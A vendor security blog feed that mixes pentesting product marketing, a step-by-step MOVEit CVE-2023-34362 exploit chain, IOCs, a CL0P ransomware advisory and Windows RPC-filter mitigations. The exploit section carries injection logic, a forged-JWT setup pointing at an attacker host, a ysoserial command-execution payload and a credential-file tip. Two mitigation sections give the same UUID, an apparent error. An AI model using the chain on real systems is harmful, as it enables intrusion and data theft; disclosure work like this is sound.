This is where autonomous pentesting approaches like NodeZero can be used to simulate the actions that would likely be taken by a ransomware attacker. This involves identifying what is exploitable, what steps attackers could take to move laterally and take over systems, how attackers could elevate permissions, and so on, then ensuring the remediation actions highlighted by the pentesting platform are performed as soon as possible.

Once remediation is complete, regularly scheduled NodeZero pentests should be performed to validate that remediations were successful and to catch any newly introduced vulnerabilities. This is not a one-and-done activity. Instead, it must become second nature to all organizations as part of their ongoing governance and risk reduction programs.

Case in point: the Year in Review for 2022 report highlights a NodeZero pentest by a North Carolina-based medical clinic. The clinic found that its systems were exploitable after NodeZero conducted open-source intelligence on the company’s name, scraped potential employee names from LinkedIn, then executed a password spraying technique to find a logon name with a common, weak, or publicly available password.

Just as an actual cyber threat actor would do, NodeZero chained other weaknesses with the successful password spray to achieve multiple critical impacts. In this case, over 1,600 credentials were captured and used to access services and infrastructure. As a result, our customer learned that NodeZero compromised one domain, almost 50 hosts, and two domain users, while discovering nearly 50 data stores to ransom. Below, you can see proof of the successful attack.

In the report, you can see additional examples of NodeZero achieving a critical impact including domain compromise, host compromise, sensitive data exposure, critical infrastructure compromise, or ransomware exposure.

To learn more about how can help you avoid ransomware attacks in your networks,

Take a Test Drive Today

and Partner to Introduce Advanced Cybersecurity into Africa

1 June 2023 at 14:19

Businesswire 06/01/2023 has joined forces with, a U.S.-based cybersecurity firm, as a fully licensed and Certified Partner to introduce advanced cybersecurity services to the African continent. This partnership aims to provide enterprises, governments, and NGOs with a comprehensive and proactive defense against cyber threats….

Read the entire article here


Clients Want Assessments to Prove Service Efficacy

5 June 2023 at 13:57

The Solution to the Growing Divide Between Providers and Clients

Gartner® recently published a report called Emerging Tech: Grow Your Security Service Revenue with Cybersecurity Validations. We believe the report provides research from a buyer’s perspective on the security services they purchase, while offering guidance to MSPs and MSSPs on how to improve retention and upsell rates for the critical services they provide. So, what has Gartner discovered, and what do they recommend?

Download Report Now

From the buyers’ perspective

Since Gartner performs inquiry sessions with clients who purchase security services, they have a unique opportunity to learn what organizations are most concerned about. The report highlights some of the key findings as follows:

  • “As more executives engage in the cybersecurity purchase and retention decision, security service clients are wanting more than just threat detection and response for their IT/OT/cloud environments.
  • Many security service clients express frustration in not knowing what their provider does for them, and they question the benefits of the service.
  • Security service clients lack cybersecurity resources and look to their provider for guidance on what to do to mitigate risk. They want a partner that will proactively help them improve their security maturity.”1

Also in the report, clients expressed the desire to have processes in place to validate that their provider’s security services are working as claimed, since they struggle to confirm their providers’ results. These processes would include a way of validating that services are improving clients’ security postures, reducing their risk, and securing their critical data and operations. The discussion around validations in the report highlights several technology areas to consider, like:

  • Attack Surface Management (ASM)
  • Breach and Attack Simulation (BAS)
  • Automated (Autonomous) Penetration Testing and Red Teaming

From the providers’ perspective

On the flip side, Gartner had inquiry sessions with service providers, who expressed their utmost desire to help clients prevent negative outcomes from cyberattacks. However, they lack clarity on what the client’s security posture is and seldom see clients taking responsibility to improve their position. As we can see from the report, we feel there is a disconnect between those who purchase services and those who deliver them.

Why we think this report is important

Gartner has the distinguished role of hearing from both sides of the many dilemmas in our industry. And when they do, we feel they not only provide an analysis of what they hear, but also bounce solutions off both sides to see what sticks. In this case, the Gartner report provides actionable recommendations for sellers of security services. From the service provider perspective, the report provides critical insights about how to grow revenue, distinct options providers should consider, and advice on what to do from both a short-term and longer-term outlook to meet their clients’ needs. Simply put, clients want more out of their providers and are willing to invest in enhanced services. Following the guidance in the report will turn out to be a win-win for both parties involved. Those who want to learn more about the contents of the report can download it here. [link]

Why do we think we were mentioned in this report?

Because our autonomous pentesting solution, called NodeZero, is the AI-driven pentesting co-pilot MSPs, MSSPs, and security consultants have come to rely on to meet their clients’ growing needs for validations—and more. The reason for this is simple. NodeZero is a force multiplier that helps service providers perform comprehensive adversary emulation and autonomous penetration testing exercises. This allows providers to meet their deliverables, enhance their clients’ security, and improve revenue and retention, all while tremendously reducing the amount of time needed to do so.

“We are seeing a tremendous uptick in interest from security providers who want to up their game and expand their services to include security assessment as part of their repertoire,” says Snehal Antani, co-founder and CEO. “They tell us there are not enough skilled assessors (aka pentesters) to perform the needed services. For example, there are only about 6000 OSCP certified ethical hackers in the US alone, and fewer elsewhere. This fact leaves providers often unable to deliver and/or enhance their services to meet client demand. This is where NodeZero comes into play.”

Today, there are many security service providers, MSPs, MSSPs, and security consultants who have standardized many of their services on NodeZero, stating that it is enabling them to overcome the limited number of pentesters they can tap into today. Not only can the solution run autonomous pentesting, but more importantly, the solution helps build a baseline of where service delivery clients are upon service engagement. This way, providers can validate improvement over time and clients can rest assured risks are reduced.

For example, “NodeZero has changed the game for my team and for our customers. What took us five person-days is now less than two days, and our customers can get frequent telemetry as opposed to a periodic snapshot of risk,” said Kelly Robertson, CEO at SecureCENTRX.

NodeZero enables providers to see their clients’ networks through the eyes of an attacker. With this perspective, they can continuously identify attack paths and exploitable weaknesses that need to be fixed. These weaknesses span critical vulnerabilities and misconfigurations, compromised credentials, sensitive data exposure, and ineffective security controls and policies. NodeZero’s reporting interface enables security providers and clients to easily understand attack paths, which weaknesses to prioritize, and how to fix them. This reduces mean-time-to-remediation (MTTR) and helps providers prove their services are delivering increasing value to their clients. MSPs and MSSPs can charge clients to fix problems that NodeZero surfaces, and they and their clients can use NodeZero to conveniently verify fixes. No longer will clients be in the dark about service efficacy.

Strategic Planning Assumptions

According to the report, “The number of security service providers that provide cybersecurity validation assessments to test their service efficacy and their client’s security posture will grow from less than 10% in 2023 to up to 40% in 2025 and over 50% by 2026. Security services providers that adopt this cybersecurity validation assessment trend will see improvement of over 5% in their acquisition, retention and upsell rates.”

After reading this report, we believe service providers that want to align to these strategic planning assumptions should seriously consider onboarding NodeZero as part of their assessments to meet these strategic goals.

Download your complimentary copy of the Gartner report and learn how to expand your business today.

Download Report Now

1Gartner, Emerging Tech: Grow Your Security Service Revenue With Cybersecurity Validations, Travis Lee, 10 April 2023.

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.


MOVEit Transfer CVE-2023-34362 Deep Dive and Indicators of Compromise

9 June 2023 at 13:48

On May 31, 2023, Progress released a security advisory for their MOVEit Transfer application which detailed a SQL injection leading to remote code execution and urged customers to update to the latest version. The vulnerability, CVE-2023-34362, was believed at the time of release to have been exploited in the wild as a 0-day for at least 30 days.

Soon after publication, a flurry of threat intelligence from various companies indicated that this vulnerability had been exploited further back than initially thought – GreyNoise saw activity 90 days prior, and Kroll reported similar activity as far back as 2021. The attacks have been attributed to the cl0p ransomware gang, which is also linked to several other recent 0-day ransomware campaigns such as PaperCut, GoAnywhere MFT, SolarWinds Serv-U, and Accellion FTA.

Figure 1. cl0p 0-day activities

Taking a Peek – Patch Diff’ing

Taking a look at the differences between the vulnerable and patched versions we find three interesting areas.

The first difference, found in the function UserGetUsersWithEmailAddress(), updates a SQL query from a concatenated string of several passed-in arguments to a safer-looking SQL builder utility. This helper function is reachable from many code paths – interestingly, from several unauthenticated paths via guestaccess.aspx.

Figure 2. UserGetUserWithEmailAddress() function differences

The second difference removes the function SetAllSessionVarsFromHeaders() entirely, along with its only caller in the machine2.aspx handler, SILMachine2, which invoked it when the received Transaction was session_setvars. Unfortunately, machine2.aspx requests will only be processed if they come from localhost.

Figure 3. SetAllSessionVarsFromHeaders() function removed

The last difference found in GetFileUploadInfo() adds a single statement which changes the way the uploadState is set by first checking if the State is null before using a new decryption helper DecryptBytesForDatabase.

Figure 4. GetFileUploadInfo() function differences

A Path to Exploitation

Foreword: looking at public threat intelligence about the series of endpoints being hit and the types of indicators of compromise, we aren’t entirely sure the path we’ve found is the exact same one used in the wild; it mixes abuse of the patched functionality with abuse of intended functionality. There are likely several paths to exploitation – there are many like it, but this one is ours.

Given that the description of the vulnerability was a SQL injection, the path to the apparent patch in UserGetUsersWithEmailAddress() was pursued first. While paths were discovered to reach this function from an unauthenticated point-of-view, we were unable to discover a way to have the controllable arguments passed to it without being ‘cleaned’ by XHTMLClean(), which converts the typical unsafe SQL characters to their HTML encoded counterparts.

The Path to Unclean Input

We shifted our focus to the other removed function, SetAllSessionVarsFromHeaders(). We found that this function had the restriction that only localhost is allowed to route to it. Threat actors were observed hitting /moveitisapi/moveitisapi.dll?action=m2, so we were hopeful that we could find a path from moveitisapi.dll to SetAllSessionVarsFromHeaders(). moveitisapi.dll is a compiled C program, which we can analyze with Ghidra. Opening it up, we find that the function at 0x180080920, dubbed action_m2, is responsible for parsing requests that contain the action=m2 request parameter. action_m2 forwards requests on to the machine2.aspx endpoint only if the passed-in header X-siLock-Transaction is equal to folder_add_by_path.

Figure 5. action_m2() function in MOVEitISAPI.dll

Unfortunately, that’s not exactly how it works. The function that extracts the X-siLock-Transaction header to compare its value to folder_add_by_path has a bug: it will incorrectly match headers whose names merely end in X-siLock-Transaction. An attacker can therefore trick the function into forwarding the request to machine2.aspx by providing a header such as xX-siLock-Transaction: folder_add_by_path, while additionally providing the correctly named header with an arbitrary transaction of their own to be executed by the machine2.aspx endpoint.

Figure 6. Transaction bypass via crafted headers
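The flawed matching and its abuse can be sketched in Python (a reconstruction of the behavior described above, not the decompiled code itself):

```python
def routed_transaction(headers):
    # moveitisapi.dll's gate: forward the request to machine2.aspx only if
    # the transaction header says folder_add_by_path. The buggy lookup
    # matches any header whose NAME merely ENDS WITH "X-siLock-Transaction".
    gate_value = None
    for name, value in headers.items():
        if name.endswith("X-siLock-Transaction"):
            gate_value = value
            break
    if gate_value != "folder_add_by_path":
        return None  # request is not forwarded
    # machine2.aspx then reads the exact header and executes THAT transaction
    return headers.get("X-siLock-Transaction")

# The decoy header satisfies the gate; the exact header smuggles in the
# transaction we actually want machine2.aspx to run.
crafted = {
    "xX-siLock-Transaction": "folder_add_by_path",  # matched first by the bug
    "X-siLock-Transaction": "session_setvars",      # actually executed
}
```

With only the correctly named header present, the gate value would be session_setvars and the request would never be forwarded; the suffix-match bug is what lets both conditions be satisfied at once.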

With entry into machine2.aspx via this backend relay of our request, we can now reach SetAllSessionVarsFromHeaders() by passing in a transaction of session_setvars. Our Cookie header, as well as all other X-siLock- headers, will be passed along with our request. Analyzing this removed function further: it parses all headers, and if a header starts with X-siLock-SessVar, it sets the corresponding session variable to the arbitrary value provided. For example, X-siLock-SessVar0: MyUsername: sysadmin will set the username of the session to the built-in sysadmin. This capability unfortunately does not let you simply assume the sysadmin role and use the application, but it does provide access to set many variables loaded in code paths that bypass the XHTMLClean() sanitization from earlier.

The Path to SQL Injection

The path to the vulnerable UserGetUsersWithEmailAddress() function we took was via an unauthenticated call to guestaccess.aspx when the passed Transaction is secmsgpost. The full call chain of relevant calls is:

guestaccess.aspx -> SILGuestAccess -> SILGuestAccess.PerformAction() -> MsgEngine.MsgPostForGuest() -> UserEngine.UserGetSelfProvisionUserRecipsWithEmailAddress() -> UserEngine.UserGetUsersWithEmailAddress()

While we will not analyze the call chain in depth and all of the variable setting whack-a-mole that was needed to reach the vulnerable function, the crux of what changed with our access to session variable manipulation is in the very beginning of guestaccess.aspx’s handler in SILGuestAccess. The main function calls this.m_pkginfo.LoadFromSession(), which sets variables from session variables that we can now influence with session_setvars.


Figure 7. LoadFromSession() loads variables from the session

Along the call chain, the SelfProvisionedRecips value is extracted as a list of comma-separated email addresses and is never cleaned before being passed to our vulnerable function. Inspecting how the SQL query is built in the vulnerable function, we see that the InstID, EscapeLikeForSQL(EmailAddress), and finally EmailAddress are formatted into the query statement. The final query statement looks like:

SELECT Username, Permissions, LoginName, Email FROM users WHERE InstID=9389 AND Deleted=0 AND (Email='<EmailAddress>' OR Email LIKE ('%EscapeLikeForSQL(<EmailAddress>)') OR Email LIKE ('EscapeLikeForSQL(<EmailAddress>)'));

The part of the query AND Email='<EmailAddress>' has our uncleaned SelfProvisionedRecips argument inserted into it. The only caveat to this injection is that, just prior to the call, the SelfProvisionedRecips variable is split on commas (,). Our injected SQL statement should therefore avoid commas to keep execution intact. We can work around needing commas by reusing the SQL injection several times to run sequential statements such as INSERT then UPDATE.
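The comma constraint follows directly from that pre-query split; a quick sketch (the payload strings are hypothetical, for illustration only):

```python
def recip_fragments(self_provisioned_recips):
    # The application splits the recipient list on commas BEFORE the query
    # is built, so a comma inside an injected payload tears it apart.
    return self_provisioned_recips.split(",")

# A payload containing a comma is broken into useless fragments...
broken = recip_fragments("x';INSERT INTO t VALUES(1,2);-- ")
# ...while a comma-free statement survives intact, so sequential
# single-column INSERT/UPDATE statements sidestep the limitation.
intact = recip_fragments("x';INSERT INTO t (a) VALUES (1);-- ")
```

This is why multi-column INSERT statements are off the table and the injection is reused across several requests instead.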

All of this information combined, an example request in Python that sets the right session variables via a request to the action=m2 endpoint, followed by a request to the guestaccess.aspx endpoint to perform the injection, would look like the following:

Figure 8. Python script excerpt to perform SQL injection

The Path to Administrator Session

With the ability to read and write any data within the MOVEit database, our next goal is to achieve elevated permissions from an unauthenticated session. Threat intelligence showed logs that the attackers would hit the /api/v1/auth/token endpoint, which is handled by MOVEit.DMZ.WebAPI. Authentication is handled here, and based on the session_grant parameter passed in, different authentication paths are taken. Several of these paths were explored, some more than others, but the path we decided to go after is when session_grant=external_token, which is handled by the function GrantTokenFromExtenralToken(). This type of authentication flow is used when the MOVEit Transfer application has been configured to use federated logins, specifically from Microsoft Outlook acting as the identity provider.

Assuming the application has been configured to use a federated login flow, users send a request to the /api/v1/auth/token endpoint with a payload that contains an RS256 JWT. The decoded JWT should look like the following:

Figure 9. Example RS256 JWT

The important information here is that the MOVEit Transfer application will reach out to the URL in the amurl field to retrieve the certificate matching the given x5t thumbprint, in order to extract and validate that the JWT was in fact signed by the identity provider. Because we control the content of the JWT, we can point it to our own endpoint that hosts our own matching certificate that will pass validation.
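A minimal sketch of the token's structure (field names taken from the description above; claim values are hypothetical), using plain base64url encoding to show the shape rather than a real RS256 signature:

```python
import base64
import json

def b64url(data: bytes) -> str:
    # JWT segments are base64url-encoded with padding stripped.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Hypothetical claims: x5t identifies which certificate (fetched from the
# attacker-controlled amurl) the server uses to validate the signature.
header = {"alg": "RS256", "typ": "JWT", "x5t": "<attacker-cert-thumbprint>"}
payload = {"amurl": "https://attacker.example/certs", "sub": "sysadmin"}

# A real token would append an RS256 signature made with the private key
# matching the certificate hosted at amurl; it is omitted in this sketch.
unsigned_token = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(payload).encode())
```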

We ultimately use the SQL injection from the previous steps to configure the database so the application believes it is configured this way, to trust our identity provider URL, and to inject an external token for the built-in sysadmin user. We also use the SQL injection to pass several checks along the way so that the sysadmin user can log in from any IP address.

Combining it all together we now obtain an access token for the sysadmin user and use it to list files they have access to.

Figure 10. Chaining issues to obtain sysadmin access token

The Path to Remote Code Execution

The last step of this exploit chain is to abuse the sysadmin access token to achieve remote code execution. Threat actors were observed hitting the /api/v1/folders, /api/v1/folders/<folder_id>/files?uploadType=resumable, and /api/v1/folders/<folder_id>/files?uploadType=resumable&fileId=<file_id> endpoints. Pairing that knowledge with the last difference observed in the patch related to file uploads, we begin looking at the file upload handlers within MOVEit.DMZ.WebApi.

The only path to the patched function, GetFileUploadInfo(), is when a file upload that was previously in progress is resumed – which matches the call to /api/v1/folders/<folder_id>/files?uploadType=resumable&fileId=<file_id>. The specific variable they now attempt to protect is this._uploadState. Examining where that variable is referenced in the .NET DLL, we see that the function DeserializeFileUploadStream() uses it to create a MemoryStream object and then immediately uses it in a call to BinaryFormatter().Deserialize(). This is a classic .NET deserialization vulnerability. Normally, the uploadState variable would not be under attacker influence, but because we have a SQL injection, we can influence the field from which that variable is set.

Figure 11. BinaryFormatter.Deserialize() on input we control
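For readers more familiar with Python than .NET, the same anti-pattern can be illustrated with `pickle`, Python's rough analogue of `BinaryFormatter`: deserializing attacker-controlled bytes lets the attacker choose what code runs. Here a harmless `str.upper` call stands in for the `os.system` gadget a real payload would carry:

```python
import pickle

class Payload:
    def __reduce__(self):
        # During unpickling, this tuple is invoked as str.upper("code executed").
        # A real gadget would return (os.system, ("<command>",)) instead.
        return (str.upper, ("code executed",))

blob = pickle.dumps(Payload())   # plays the role of the attacker-set uploadState
result = pickle.loads(blob)      # unsafe, like BinaryFormatter().Deserialize()
print(result)                    # prints "CODE EXECUTED"
```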

Looking at the state of the database from which the uploadState variable is set, we find that the State value is NULL. We need this State value to contain our base64-encoded serialized .NET payload.

Figure 12. Database table fileuploadinfo schema

Using a tool like ysoserial.net, we generate a payload for the formatter in use.

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "cmd.exe /C echo DIRTY MIKE AND THE BOYS WERE HERE > C:\Windows\Temp\message.txt" -o base64

Figure 13. ysoserial payload generation

The only hurdle to overcome is that, when reading the State field from the database, the application expects the data to be encrypted with an organization-specific encryption key. We spent some time looking at how we could extract and re-implement the encryption, but thankfully there's a simple workaround. When initiating the file upload, you can optionally provide a Comment. This comment is encrypted with that organization-specific key. We can provide our base64 ysoserial payload as the comment when initiating the upload and have the application do the heavy lifting for us.

Preparing the application to reach this bit of code requires several interactions:

  1. Retrieve the user’s FolderID by requesting /api/v1/folders
  2. Retrieve a FileID by starting a file upload by requesting /api/v1/folders/<folder_id>/files?uploadType=resumable and providing our payload as the Comment
  3. Use SQL injection to copy the Comment to the State field
  4. Resume the file upload triggering loading of State into uploadState and calling BinaryFormatter.Deserialize(uploadState)
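The steps above can be laid out as a sketch (placeholder host and IDs; HTTP methods are omitted since only the endpoints are confirmed above, and the real requests also carry the sysadmin access token):

```python
base = "https://target.example"                    # placeholder MOVEit Transfer host
folder_id, file_id = "<folder_id>", "<file_id>"    # returned by steps 1 and 2

steps = [
    f"{base}/api/v1/folders",                                          # 1. retrieve FolderID
    f"{base}/api/v1/folders/{folder_id}/files?uploadType=resumable",   # 2. start upload, payload in Comment
    "SQL injection: copy the encrypted Comment into fileuploadinfo.State",  # 3. via the earlier injection
    f"{base}/api/v1/folders/{folder_id}/files?uploadType=resumable&fileId={file_id}",  # 4. resume -> deserialize
]
```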

The full exploit chain in action writes a file to C:\Windows\Temp\message.txt.

Figure 14. Executing the proof-of-concept exploit

Figure 15. Remote Code Execution

Our proof of concept can be found on our GitHub.

Post-Exploitation Bonus

If you find yourself on a MOVEit Transfer server that was deployed via the Azure Marketplace (and in some other cases), in C:\MOVEitDMZ_Install.INI you will find cleartext credentials for the provisioned sysadmin account, database credentials, and the service credential – all great targets for lateral movement.

Figure 16. MOVEitDMZ_Install.INI

This file is used for unattended installs, and users are given the option to preserve it after normal installations as well.

MOVEitDMZ_Install.INI – The parameter input file for the installation. You can create an INI file by performing a standard MOVEit DMZ installation and NOT deleting the file at the end. Once you have the INI file, you can modify it in a text editor to customize the input for use as an unattended install.
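As a quick triage sketch, a defender could check such a file for populated credential fields with `configparser`. The section and key names below are invented for illustration; the real layout of MOVEitDMZ_Install.INI differs:

```python
import configparser

# Hypothetical contents; real key names in MOVEitDMZ_Install.INI differ.
ini_text = """
[Install]
SysadminPassword = hunter2
DatabasePassword = hunter3
"""

cp = configparser.ConfigParser()
cp.read_string(ini_text)

# Flag any non-empty values in the credential section for rotation/removal.
# (configparser lowercases option names by default.)
leaked = {key: value for key, value in cp["Install"].items() if value}
```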

Indicators of Compromise

Our exploit path may not be similar to paths taken by recent threat actors, but there are several places to look for indicators.

The database tables userexternaltokens, trustedexternaltokenproviders, and hostpermits all had entries inserted to achieve the sysadmin access token. The fileuploadinfo table was altered to obtain RCE. One should inspect these tables to look for any anomalous entries.

Log entries for endpoint traffic can be found in the following areas:

  • <InstallDir>/Logs/DMZ_WebApi.log when requests are made to /api/v1/ endpoints
  • <InstallDir>/Logs/DMZ_WEB.log when requests are made to /guestaccess.aspx and relayed messages to /machine2.aspx
  • <InstallDir>/Logs/DMZ_ISAPI.log when requests are made to /moveitisapi/moveitisapi.dll?action=m2
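A minimal sketch of scanning those logs for the exploit-chain endpoints listed above (the sample log line format is hypothetical):

```python
import re

# Endpoints associated with the exploit chain, per the list above.
SUSPICIOUS = re.compile(
    r"/moveitisapi/moveitisapi\.dll\?action=m2"
    r"|/guestaccess\.aspx"
    r"|/api/v1/auth/token"
)

def suspicious_lines(log_lines):
    """Return log lines that mention any exploit-chain endpoint."""
    return [line for line in log_lines if SUSPICIOUS.search(line)]

sample = [
    "GET /home.aspx 200",
    "POST /moveitisapi/moveitisapi.dll?action=m2 200",
    "POST /api/v1/auth/token 200",
]
```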

The post MOVEit Transfer CVE-2023-34362 Deep Dive and Indicators of Compromise appeared first on Horizon3.ai.

Horizon3.ai, Specialist for Autonomous Penetration Testing, Enters UK Market with Leading IT Partner Companies

By: Cassie
15 June 2023 at 15:17

Press Portal 06/15/2023: Horizon3.ai is announcing several high-profile partnerships to expand its market presence in the United Kingdom and is increasing the availability of NodeZero to enterprises in that region. NodeZero is an AI-based penetration testing platform delivered as a true SaaS offering. Organizations of all sizes use NodeZero to discover and help remediate security risks within their IT infrastructures….

Read the entire article here


INSIGHT – MOVEit Zero-Day Reminds Us Yet Again to Be Diligent in Monitoring Our IT Infrastructure

Over the last week, the widely reported critical security flaw in the Progress MOVEit Transfer application (CVE-2023-34362) reminded us yet again to remain vigilant in securing our IT infrastructure from potential cyber threat actors. As part of the #StopRansomware campaign, the Cybersecurity & Infrastructure Security Agency (CISA) published a joint Cybersecurity Advisory (CSA) detailing the importance of organizations protecting against ransomware while maintaining a pulse on the current threat landscape. According to Progress, MOVEit Transfer is used worldwide by thousands of customers, including major companies like Disney, Chase, and BlueCross Blue Shield, to manage their file transfer operations. The CL0P ransomware gang, also known as Lace Tempest, is credited with initially exploiting the zero-day vulnerability and publishing an extortion note on its dark web leak site claiming to have information on hundreds of businesses.

CVE-2023-34362 poses a significant risk to businesses relying on MOVEit for file transfer operations. The active exploitation of this vulnerability by threat actors emphasizes the need for swift action. This post is intended to help you increase your understanding of the potential impacts and offer recommendations about security measures you can take to fortify your defenses and mitigate the risk posed by CVE-2023-34362.

An attack targeting MOVEit’s web application could prove detrimental to any organization, because the application is responsible for interfacing with MySQL, Microsoft SQL Server, and Azure SQL database engines. This critical flaw is an SQL injection vulnerability that lets unauthenticated attackers gain access to unpatched MOVEit servers and execute arbitrary code remotely, giving them access to sensitive data, the ability to disrupt systems, or complete compromise of the file transfer infrastructure. With reports of active exploitation in the wild, it is crucial to comprehend the implications of CVE-2023-34362 on businesses relying on MOVEit.

Open-source reporting indicates that cyber threat actors are actively exploiting or seeking to exploit CVE-2023-34362 in real-world scenarios, highlighting the urgency of addressing this vulnerability. CL0P, the initial group to exploit this vulnerability, is notorious for being a “big game hunter” that targets organizations with large budgets by issuing proportionally large ransom demands – some demands have gone as high as $20 million. However, CL0P also hones and sharpens their skills by targeting smaller organizations. Additionally, they have been known to target the Public Health and Healthcare industry in the past. Some examples include: 

  • April 2020: ExecuPharm, Inc., a U.S.-based pharmaceutical research company  
  • May 2020: Carestream Dental LLC, a U.S.-based provider of dental equipment  
  • November 2020: Nova Biomedical, a U.S.-based medical device manufacturer 

While we do not have insight into how much money CL0P is demanding, they have provided the public with step-by-step instructions for would-be victims (see Graphic #1 below). As of 14 June, CL0P appears to have followed through with at least a portion of the instructions when they published the names of a handful of companies that presumably refused to contact them.  

CL0P Ransomware Gang leaves an extortion note for MOVEit Transfer application users
Graphic #1: CL0P Ransomware Gang leaves an extortion note for MOVEit Transfer application users.


CL0P has been in the ransomware game since 2019-2020 and is known for targeting managed file transfer (MFT) applications, touting ransomware as a service (RaaS) to infiltrate its targets' IT infrastructure. Mostly targeting MFT applications, they continue to use these holes in vulnerable software for monetary gain. CL0P has also been attributed to several other recent zero-day ransomware campaigns, such as PaperCut, GoAnywhere MFT, SolarWinds Serv-U, and Accellion FTA. For example, in mid-March CL0P exploited the GoAnywhere MFT vulnerability (CVE-2023-0669) to gain access and steal data, and has reportedly targeted over 130 organizations worldwide. Using similar tactics, techniques, and procedures (TTPs), their main goals are disrupting daily organizational cyber activity, stealing sensitive data, and finding other opportunistic ways to disrupt or deploy further attacks.

What Now?

Horizon3.ai proactively warns customers about potential zero-day and N-day ransomware attacks and impacts so that they can take immediate action to fix potential vulnerabilities and mitigate possible threats. Exploitation by any cyber threat actor poses a significant risk to businesses relying on the MOVEit web application for file transfer operations. Key impacts on businesses include:

  • Data Breaches and Intellectual Property Theft (including current and former employee data)
  • Operational Disruption and Downtime
  • Manipulation of File Transfers
  • Reputational Damage and Legal Consequences

Mitigation and Recommendations:

  • Implement Regular Pentest Cadence (NodeZero)
  • Apply Security Patches and Updates (Progress Security Advisory)
  • Implement Intrusion Detection and Prevention Systems
  • Conduct Regular Security Audits
  • User Awareness and Training

In conclusion, the CVE-2023-34362 vulnerability in MOVEit’s web application poses significant risks to businesses relying on the software for file transfer operations. Exploitation of this vulnerability can result in data breaches, intellectual property theft, operational disruptions, manipulated file transfers, reputational damage, and legal consequences. To mitigate these risks, organizations should promptly apply security patches, implement regular pentest cadence, implement intrusion detection and prevention systems, conduct regular security audits, and provide user awareness and training. By taking these proactive measures, businesses can enhance their security posture and minimize the potential impacts of CVE-2023-34362 and thwart possible attacks by groups such as CL0P. It is crucial for organizations to prioritize cybersecurity and remain vigilant in addressing vulnerabilities to protect their sensitive data and maintain the trust of stakeholders. 

Please see our Horizon3 Attack Team’s blog MOVEit Transfer CVE-2023-34362 Deep Dive and Indicators of Compromise for extensive technical information!



Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-FSRVP

20 June 2023 at 19:02

Block remote MS-FSRVP functionality with RPC Filters

If the Microsoft File Server Remote VSS Protocol (MS-FSRVP) is not required, administrators should block the remote MS-FSRVP functionality for non-Domain Admins on the vulnerable host using RPC filters.

    1. Create a text file with the following content:
      add rule layer=um actiontype=permit
      add condition field=if_uuid matchtype=equal data=4FC742E0-4A10-11CF-8273-00AA004AE673
      add condition field=remote_user_token matchtype=equal data=D:(A;;CC;;;DA)
      add filter
      add rule layer=um actiontype=block
      add condition field=if_uuid matchtype=equal data=4FC742E0-4A10-11CF-8273-00AA004AE673
      add filter
    2. Use the netsh command line utility to import the RPC filter from an elevated administrator prompt:
      netsh -f <FILTER_FILE_NAME>
    3. To confirm the filters are in place, you can view the current RPC filters using the following command:
      netsh rpc filter show filter
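Since essentially the same netsh recipe recurs for several protocols below with only the interface UUID changing, a small generator can produce the filter file. This is an illustrative sketch; verify its output against the documented `netsh rpc filter` syntax before use:

```python
def rpc_filter_rules(if_uuid: str, allow_domain_admins: bool = False) -> str:
    """Emit netsh rpc filter rules that block remote use of an RPC interface."""
    rules = []
    if allow_domain_admins:
        # Permit Domain Admins (SDDL: D:(A;;CC;;;DA)) before the block rule.
        rules += [
            "add rule layer=um actiontype=permit",
            f"add condition field=if_uuid matchtype=equal data={if_uuid}",
            "add condition field=remote_user_token matchtype=equal data=D:(A;;CC;;;DA)",
            "add filter",
        ]
    rules += [
        "add rule layer=um actiontype=block",
        f"add condition field=if_uuid matchtype=equal data={if_uuid}",
        "add filter",
    ]
    return "\n".join(rules)

# MS-FSRVP interface UUID from the steps above:
fsrvp = rpc_filter_rules("4FC742E0-4A10-11CF-8273-00AA004AE673", allow_domain_admins=True)
```

The resulting text can be saved to a file and imported with `netsh -f <FILTER_FILE_NAME>` as described in step 2.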

See CERT Coordination Center Vulnerability Note VU#405600 for additional details on protecting Active Directory Certificate Services from NTLM relay attacks.


Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-RPRN

20 June 2023 at 19:10

Block remote MS-RPRN functionality with RPC Filters

If Microsoft Print System Remote Protocol (MS-RPRN) is not required, administrators should block the remote MS-RPRN functionality on the vulnerable host using RPC filters.

    1. Create a text file with the following content:
      add rule layer=um actiontype=block
      add condition field=if_uuid matchtype=equal data=12345678-1234-ABCD-EF00-0123456789AB
      add filter
    2. Use the netsh command line utility to import the RPC filter from an elevated administrator prompt:
      netsh -f <FILTER_FILE_NAME>
    3. To confirm the filters are in place, you can view the current RPC filters using the following command:
      netsh rpc filter show filter

See CERT Coordination Center Vulnerability Note VU#405600 for additional details on protecting Active Directory Certificate Services from NTLM relay attacks.


Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-DFSNM

20 June 2023 at 19:14

Block remote MS-DFSNM functionality with RPC Filters

If Microsoft Distributed File System (DFS) Namespace Management Protocol (MS-DFSNM) is not required, administrators should block the remote MS-DFSNM functionality for non-Domain Admins on the vulnerable host using RPC filters.

    1. Create a text file with the following content:
      add rule layer=um actiontype=permit
      add condition field=if_uuid matchtype=equal data=4FC742E0-4A10-11CF-8273-00AA004AE673
      add condition field=remote_user_token matchtype=equal data=D:(A;;CC;;;DA)
      add filter
      add rule layer=um actiontype=block
      add condition field=if_uuid matchtype=equal data=4FC742E0-4A10-11CF-8273-00AA004AE673
      add filter
    2. Use the netsh command line utility to import the RPC filter from an elevated administrator prompt:
      netsh -f <FILTER_FILE_NAME>
    3. To confirm the filters are in place, you can view the current RPC filters using the following command:
      netsh rpc filter show filter

See CERT Coordination Center Vulnerability Note VU#405600 for additional details on protecting Active Directory Certificate Services from NTLM relay attacks.


Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-EVEN

20 June 2023 at 19:20

Block remote MS-EVEN functionality with RPC Filters

If Microsoft EventLog Remoting Protocol (MS-EVEN) is not required, administrators should block the remote MS-EVEN functionality on the vulnerable host using RPC filters.

    1. Create a text file with the following content:
      add rule layer=um actiontype=block
      add condition field=if_uuid matchtype=equal data=82273FDC-E32A-18C3-3F78-827929DC23EA
      add filter
